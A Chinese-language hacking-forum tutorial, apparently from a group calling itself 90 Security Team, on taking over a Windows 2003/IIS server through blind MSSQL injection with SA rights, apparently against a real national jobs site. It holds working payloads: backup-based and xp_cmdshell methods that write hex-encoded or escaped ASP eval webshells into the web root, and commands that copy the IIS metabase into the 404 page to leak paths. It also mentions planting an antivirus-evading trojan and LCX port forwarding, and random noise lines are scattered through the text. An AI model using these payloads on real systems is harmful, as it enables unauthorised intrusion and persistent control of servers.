sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

' O1 {6 D0 |1 t6 X: I9 }- H
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
$ v- L6 a0 O' G: ?* v7 C
                                                                 
; r+ i3 J, c' [                                                                 
7 Q0 l' v1 K9 \* a4 ]  T" Y1 z                                                                  论坛： http://www.90team.net/
) g. d: V; J4 K" `' e- P

0 z( p7 M9 V! ]1 Z. u
友情检测国家人才网

/ |# J2 g3 R6 W* N3 l: v
% ?, a2 G0 v( n  k内容：MSSQL注入SA权限不显错模式下的入侵
' L" b7 _) y5 o/ ?1 E. `
  B7 ^& a+ S" _
* N7 V# x0 s  u' ], E一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
+ }; Z, u, t1 S4 r$ ~# c9 X

8 ]; p* T$ l4 R这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
4 ]' D7 b: L! J4 o& W' C
思路：

; H4 }) }, X- K) U7 V5 P6 V+ @) R首先：
. A8 W8 t; P, ~% {* n
. C9 G1 n/ g; u3 c+ ~) b通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
! D& ?' d2 [1 f# h; U' o
1.日志备份获得Webshell
, |% m- g& _  B* k" I
2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

4 J& o7 `% v+ m- j# i5 d5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。


: e, ]; c% B" c% ?+ \' }+ T, t
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
) B4 ~, q" v( q3 o; r
* |8 _" I7 h9 y我直接演示后面一个方法

/ k5 M% c6 D/ J4 r  W; s0 h/ b8 c
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
& S$ e+ V7 E4 l9 ]
# ?# C2 p% O5 P1 c) m" R# N
& M7 ?, P& x- y: N

◆日志备份：

$ Y; ]( N- t5 Q5 D4 U
6 q+ F( e. d# @% g! [3 D7 Z0 i! ?+ T1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
2 Y! ^( r5 K2 B& @# s8 [1 B& D
3 A/ _, X* H: s8 u2. 插入数据
5 L! R, b7 J) m. c5 P% t( b;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
0 J; c# k  i  z0 I. V* O5 r+ t  l# G  
3. 备份并获得文件，删除临时表
* \5 b5 o! p$ F/ g5 F;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
9 e# n6 {  |1 d! X- l


◆数据库差异备份
5 m6 w( ?" H5 @: U2 _6 A: }' N/ ^
7 c$ O4 m  x, G, ^4 h$ O" J& ^( V（1. 进行差异备份准备工作
# T5 d( A. G) R9 }, ^
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
( x8 a2 Q/ [0 h4 d6 ~" _
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
% z  _( l  u6 W$ r

' T% o& |; a$ G" g（2. 将数据写入到数据库
; n  d- a% q+ a0 X' i) w, Y$ R0 T5 G;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

! Y' w7 F1 Q6 ~4 I0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
5 F4 J/ c7 L+ E& W2 U! o: q
3. 备份数据库并清理临时文件

: P* C! Y; s9 M  b  V;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
1 U/ e- k% M+ S2 g% V) r
9 q' B4 B# B; B" Y6 T0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
2 _) @$ C2 G# n$ e' @4 q9 E7 U
( ~' w$ {) J' n
/ f& c1 A" n* v
3 h! Q8 D5 x: x6 H3 }" l/ z用^转义字符来写ASP(一句话木马)文件的方法:   

! C! G! m8 F# ~8 ^1 [0 s1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
. o* ^. U9 P& A" Q( |7 x7 I
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

# i( I' C2 W" A$ q读取IIS配置信息获取web路径

$ d( N# |; o+ g$ a. n4 P" E- j# K3 @     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

9 {  v, C' p6 O, j4 I1 u执行命令
) O' L9 {& p5 B0 D8 x* Q$ E     
$ @  f: X5 S4 g, f0 I     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
% P0 e! l! v' k. r0 ?2 I0 n
* Y0 ?8 }; u* A- K  J
. {. O  Y6 q0 N


; j9 f1 b/ t( ^
5 R" _3 _8 B8 ?3 g' O3 ]

* E( y' s5 K; @! ]/ f' k
3 b9 p+ C6 q( b% g- U' N


! L2 ~' K- y2 @6 `. v

; H) z5 g! H; k+ N9 W$ y- {' A4 x/ ^


6 n+ N: j# Q+ d9 G1 X8 \: c
* \9 m+ E. A9 X3 m* r5 l0 p1 E# F
3 A( k+ m8 o; y4 j( E9 H

, k1 G  R6 I' d









( }* S, V. R% m) x0 Z
, G* x/ L" g* C! X
, H: Q' G, X0 ~; a

3 T* B$ u; Z+ M: o& \
1 ^& f; U! e: Z( G, g: E
! w4 V5 f/ k- Y" C2 C* Q3 o* r* B/ i9 C



" e" B: N( D% a8 p  L: X
0 C3 m; f; L$ m8 q

) c; _# H: @) v" k- x8 e



. v6 G9 h5 I. x. i& k& X1 O) \